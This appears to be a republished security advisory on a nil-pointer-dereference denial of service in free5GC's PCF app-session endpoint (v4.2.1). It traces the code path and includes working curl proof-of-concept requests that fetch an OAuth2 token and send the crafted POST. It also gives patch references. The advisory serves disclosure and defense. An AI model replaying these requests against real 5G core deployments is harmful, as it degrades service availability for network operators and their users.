Listen to this Post
The vulnerability resides in the PCF’s POST `/npcf-policyauthorization/v1/app-sessions` handler. A single authenticated request triggers a panic when `ascReqData.suppFeat` is set to `”1″` (enabling traffic-routing feature negotiation) and a `medComponents` entry provides an `afAppId` but lacks the optional `AfRoutReq` field. The code path then calls `provisioningOfTrafficRoutingInfo(smPolicy, appID, routeReq, …)` with `routeReq == nil` and dereferences `routeReq.RouteToLocs` (and other fields) without a nil check. This causes a runtime error: invalid memory address or nil pointer dereference. Gin recovery converts the panic into an HTTP 500 error. Changing only `suppFeat` from `”0″` to `”1″` flips the same POST shape from a normal `201 Created` into a panic-driven 500. The endpoint requires a valid `npcf-policyauthorization` OAuth2 access token (PR:L). The PCF process is not killed (Gin recovers), so the realized impact is a per-request panic-DoS on the app-session create path. Validated against the PCF container in the official Docker compose lab, source repo tag v4.2.1, PCF endpoint http://10.100.200.9:8000`, validation date 2026-03-12. The vulnerable handler path is `postAppSessCtxProcedure` → `medComponents` loop → `appID := medComp.AfAppId; routeReq := medComp.AfRoutReq` (nil when absent) →provisioningOfTrafficRoutingInfo(smPolicy, appID, routeReq, medComp.FStatus). InprovisioningOfTrafficRoutingInfo,routeReq.RouteToLocs,routeReq.UpPathChgSub, and `routeReq.AppReloc` are dereferenced directly without a nil check. When `suppFeat` is `"0"` the traffic-routing branch is not entered and the same input shape returns201 Created. Code evidence infree5gc/pcf: NFs/pcf/internal/sbi/api_policyauthorization.go, NFs/pcf/internal/sbi/processor/policyauthorization.go (line 1740). PoC reproduced.
Platform: free5GC PCF
Version: v4.2.1
Vulnerability : Nil pointer dereference
Severity: Medium
date: 2026-03-12
<h2 style="color: blue;">Prediction: 2026-03-15</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
Obtain valid npcf-policyauthorization token from NRF
curl -sS -X POST 'http://10.100.200.3:8000/oauth2/token' \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data 'grant_type=client_credentials&nfType=NEF&nfInstanceId=b84c4f0a-6010-4972-8480-e44e625b9ee4&targetNfType=PCF&scope=npcf-policyauthorization'
Trigger panic with suppFeat="1", afAppId present, AfRoutReq absent
curl -i -X POST 'http://10.100.200.9:8000/npcf-policyauthorization/v1/app-sessions' \
-H 'Content-Type: application/json' \
-H 'Authorization: Bearer <valid_npcf_policyauthorization_jwt>' \
--data '{"ascReqData":{"suppFeat":"1","notifUri":"http://127.0.0.1:9999/appsess","ueIpv4":"10.60.0.3","dnn":"internet","medComponents":{"1":{"medCompN":1,"afAppId":"app1"}}}}'
Control comparison with suppFeat="0" returns 201 Created
curl -i -X POST 'http://10.100.200.9:8000/npcf-policyauthorization/v1/app-sessions' \
-H 'Content-Type: application/json' \
-H 'Authorization: Bearer <valid_npcf_policyauthorization_jwt>' \
--data '{"ascReqData":{"suppFeat":"0","notifUri":"http://127.0.0.1:9999/appsess","ueIpv4":"10.60.0.3","dnn":"internet","medComponents":{"1":{"medCompN":1,"afAppId":"app1"}}}}'
<h2 style="color: blue;">Exploit:</h2>
Any party holding a valid `npcf-policyauthorization` token can repeatedly send a crafted POST request (withsuppFeat=”1″, `afAppId` present, `AfRoutReq` absent) tohttp://10.100.200.9:8000/npcf-policyauthorization/v1/app-sessions`, causing a nil pointer dereference panic, HTTP 500 response, and log spam. Each request degrades availability without killing the PCF process.
Protection from this CVE:
Upgrade to a patched version of free5GC where `provisioningOfTrafficRoutingInfo` includes a nil check for `routeReq` (as in commit 508d70b). Alternatively, apply the fix from upstream pull request free5gc/pcf65.
Impact:
Denial of service (DoS) via authenticated requests, limited to per-request degradation; no confidentiality or persistent integrity impact.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
